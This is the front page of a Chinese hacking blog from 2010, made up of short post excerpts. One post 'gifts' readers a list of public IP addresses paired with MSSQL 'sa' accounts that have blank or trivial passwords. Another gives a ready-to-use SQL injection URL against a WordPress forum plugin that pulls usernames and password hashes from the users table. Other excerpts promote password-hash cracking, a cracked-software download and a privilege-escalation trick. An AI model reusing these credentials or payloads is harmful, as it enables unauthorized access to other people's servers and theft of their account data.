凌风[0x0F]'s BloG

Enjoy In Hacking

黑客在线工具 联系方式 移到底部 登录

我的主页

送大家一点SA弱口令

118.112.141.255 sa ""

 

118.112.216.169 sa ""

118.112.219.26 sa ""

118.113.219.153 sa ""

118.113.195.180 sa ""

118.113.217.245 sa ""

118.114.85.118 sa sa

...
0x0F 于2010年7月13日 发自 杂七杂八 阅读 | 对话 | 收藏

WordPress免费论坛Blog系统SqL注入漏洞

WordPress是一款免费的论坛Blog系统。

WordPress所使用的Simple:Press插件没有正确地过滤用户在搜索字段所输入的搜索变量便注入到了SQL查询中使用:

sf-header-forum.php  

代码:略

测试方法: http://127.0.1/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2

...
0x0F 于2010年7月13日 发自 漏洞发布 阅读 | 对话 | 收藏

Blog Software Breakdown

Even before the whole Movable Type fallout, I had been trying to decide which of the many weblog CMS packages would be best for my needs. (Choice made!) I got tired of flipping back and forth between each of the sites, especially when not all of the answers to my questions were apparent from simply reading the main web page.

0x0F 于2010年7月13日 发自 杂七杂八 阅读 | 对话 | 收藏

如果你要破解的MD5是收费的话,尽量来这里看看

哈哈,推荐网站的

0x0F 于2010年7月13日 发自 技术文章 阅读 | 对话 | 收藏

MySQL Injection Cheat Sheet

是听说SINK最近在搞手工注入MYSQL,我给他弄点东西,需要的朋友看看吧,老了

0x0F 于2010年7月13日 发自 技术文章 阅读 | 对话 | 收藏

反对此次活动

理由省略

0x0F 于2010年7月13日 发自 杂七杂八 阅读 | 对话 | 收藏

管中窥豹2.62+终极完美破解补丁

不解释直接点击下载

0x0F 于2010年7月12日 发自 技术文章 阅读 | 对话 | 收藏

MYSQL存储过程的越权执行

转自 ninty's BloG http://x60a6.info/

 

0x0F 于2010年7月12日 发自 技术文章 阅读 | 对话 | 收藏

Determine data through Blind SQL Injection

令人蛋疼的文章,看之前一定要蛋定...

0x0F 于2010年7月12日 发自 技术文章 阅读 | 对话 | 收藏

ws2help.dll 提权0day

方法提供:miao(北洋贱队)

信息来源:第八个编程www.debugc.com7

有一种提权方式,就是在没什么进展的时候,可以替换掉服务中的某个程序,在服务器重启的时候获得一个权限。)

...
0x0F 于2010年7月12日 发自 技术文章 阅读 | 对话 | 收藏

博主:0x0F

专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)

腾讯微博

<123456789>
返回顶部↑